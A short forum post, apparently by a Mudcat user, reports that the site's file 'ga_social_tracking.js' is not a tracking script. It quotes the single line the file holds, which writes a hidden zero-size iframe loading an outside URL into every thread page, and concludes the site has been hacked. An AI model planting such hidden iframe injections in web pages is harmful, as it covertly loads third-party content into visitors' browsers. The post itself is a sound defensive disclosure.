The file "ga_social_tracking.js" that I get is not what it claims to be, but consists of a single line

document.write("<iframe width='0' height='0' src='http://www.2345.com/?ktjwh202'></iframe>");

Now my JavaScript is a bit rusty (haha), but obviously this script is called to insert the line mentioned in the 2345 thread into the HTML of each thread display.

This fact alone now seems to prove that Mudcat has been hacked, hardly as a harmless prank. Immediate action is required. I for one disable JavaScript completely.